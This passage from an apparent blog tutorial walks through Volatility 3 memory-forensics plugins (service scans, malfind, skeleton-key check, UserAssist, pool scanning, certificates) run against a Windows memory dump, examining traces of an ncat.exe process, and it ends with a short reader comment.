0xffffd187c1c82e00 N/A Disabled 4260 ncat.exe 0xd187c158d7d0 0x7e110000 0x7e17afff Vad PAGE_EXECUTE_WRITECOPY 18 0 ... 4260 ncat.exe 0xd187c1faf730 0x7ffe2ab70000 0x7ffe2ad64fff Vad PAGE_EXECUTE_WRITECOPY 16 0 0xffffd187c10da7f0 \Windows\System32\ntdll.dll Disabled .......
Get information on existing services
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.svcscan.SvcScan | more Volatility 3 Framework 2.0.2 PDB scanning finished Offset Order PID Start State Type Name Display Binary 0x1887f463cf0 399 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_SHARE_PROCESS RpcEptMapper RPC Endpoint Mapper - 0x1887f463d00 398 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_WIN32_OWN_PROCESS rpcapd rpcapd N/A 0x1887f463960 397 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_WIN32_SHARE_PROCESS RmSvc RmSvc N/A 0x1887f463ed0 396 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_KERNEL_DRIVER rhproxy rhproxy N/A 0x1887f468b10 395 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_KERNEL_DRIVER RFCOMM RFCOMM N/A ...
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.getservicesids.GetServiceSIDs | more Volatility 3 Framework 2.0.2 PDB scanning finished SID Service S-1-5-80-4151353957-356578678-4163131872-800126167-2037860865 .NET CLR Networking 4.0.0.0 S-1-5-80-1135273183-3738781202-689480478-891280274-255333391 .NET Memory Cache 4.0 S-1-5-80-3459415445-2224257447-3423677131-2829651752-4257665947 3ware S-1-5-80-2917441881-3404282297-3983348447-1829381237-2935805708 AarSvc S-1-5-80-1925620318-959733373-4030606672-1109042073-4287256036 AarSvc_2ea6a S-1-5-80-1975967573-2913356537-819030703-3730719923-1995772179 AcpiDev S-1-5-80-2670625634-2386107419-4204951937-4094372046-2600379021 acpiex S-1-5-80-3267050047-1503497915-401953950-2662906978-1179039408 acpipagr ....
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.malfind.Malfind --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Hexdump Disasm 4260 ncat.exe 0xf40000 0xf40fff VadS PAGE_EXECUTE_READWRITE|PAGE_NOCACHE 1 1 Disabled 68 90 4f 25 77 9c 60 68 h.O%w.`h 14 00 f4 00 e8 5f b7 e0 ....._.. 74 61 9d c3 43 00 3a 00 ta..C.:. 5c 00 54 00 6f 00 6f 00 \.T.o.o. 6c 00 73 00 5c 00 43 00 l.s.\.C. 6d 00 64 00 65 00 72 00 m.d.e.r. 5c 00 76 00 65 00 6e 00 \.v.e.n. 64 00 6f 00 72 00 5c 00 d.o.r.\. 0xf40000: push 0x77254f90 0xf40005: pushfd 0xf40006: pushal 0xf40007: push 0xf40014 0xf4000c: call 0x75d4b770 ...
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.skeleton_key_check.Skeleton_Key_Check Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Skeleton Key Found rc4HmacInitialize rc4HmacDecrypt 612 lsass.exe False 0x7ffe279d63c0 0x7ffe279d6800
Peeking into the userassist.
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.registry.userassist.UserAssist | more Volatility 3 Framework 2.0.2 PDB scanning finished Hive Offset Hive Name Path Last Write Time Type Name ID Count Focus Count Time Focused Last Updated Raw D ata 0xe50a50363000 hive0xe50a50363000 - - - - - - - - - - 0xe50a5048a000 hive0xe50a5048a000 - - - - - - - - - - 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC 14-11DF-BB8C-A2F1DED72085}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{A3D53349-6E 61-4557-8FC7-0028EDCEEBF6}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{B267E3AD-A8 25-4A09-82B9-EEC22AA3B847}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{BCB48336-4D DD-48FF-BB0B-D3190DACB3E2}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CAA59E3C-47 92-41A5-9909-6A6A8D32490E}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-AC E2-4F4F-9178-9926F41749EA}\Count 2022-02-25 18:21:12.000000 Key N/A N/A N/A N/A N/A N/A N/A * 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEB FF5CD-ACE2-4F4F-9178-9926F41749EA}\Count 2022-02-25 18:21:12.000000 Value UEME_CTLCUACount:ctor N/A 0 0 0:00: 00.500000 N/A ff ff ff ff 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 80 bf 00 00 80 bf ........ 00 00 80 bf 00 00 80 bf ........ 00 00 80 bf 00 00 80 bf ........ 00 00 80 bf 00 00 80 bf ........ 00 00 80 bf 00 00 80 bf ........ ff ff ff ff 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ ...
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.poolscanner.PoolScanner | grep -i ncat symbol_table_name1!_EPROCESS 0xd187c11a5000inlayer_name ncat.exe symbol_table_name1!_FILE_OBJECT 0xd187c14adcf0 layer_name \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe symbol_table_name1!_EPROCESS 0xd187c1af3000 layer_name ncat.exe symbol_table_name1!_FILE_OBJECT 0xd187c1e11b60 layer_name \ProgramData\chocolatey\bin\ncat.exe symbol_table_name1!_FILE_OBJECT 0xd187c1e27960 layer_name \Windows\Prefetch\NCAT.EXE-4B4B887F.pf symbol_table_name1!_FILE_OBJECT 0xd187c1e2a200 layer_name \ProgramData\chocolatey\bin\ncat.exe symbol_table_name1!_FILE_OBJECT 0xd187c1e326d0 layer_name \Windows\Prefetch\NCAT.EXE-1B3976EF.pf symbol_table_name1!_FILE_OBJECT 0xd187c1e347a0 layer_name \ncat-0 symbol_table_name1!_FILE_OBJECT 0xd187c1e34930 layer_name \ncat-0
Extracting certificate information.
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.registry.certificates.Certificates | more Volatility 3 Framework 2.0.2 PDB scanning finished Certificate path Certificate section Certificate ID Certificate name Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot 02FAF3E291435468607857694DF5E45B68851868 Sectigo (AddTrust) Microsoft\SystemCertificates AuthRoot 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 DigiCert Microsoft\SystemCertificates AuthRoot 07E032E020B72C3F192F0628A2593A19A70F069E Certum Trusted Network CA Microsoft\SystemCertificates AuthRoot 2796BAE63F1801E277261BA0D77770028F20EEE4 Go Daddy Class 2 Certification Authority Microsoft\SystemCertificates AuthRoot 2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Sectigo Microsoft\SystemCertificates AuthRoot 3679CA35668772304D30A5FB873B0FA77BB70D54 VeriSign Universal Root Certification Authori ty
noice
ReplyDelete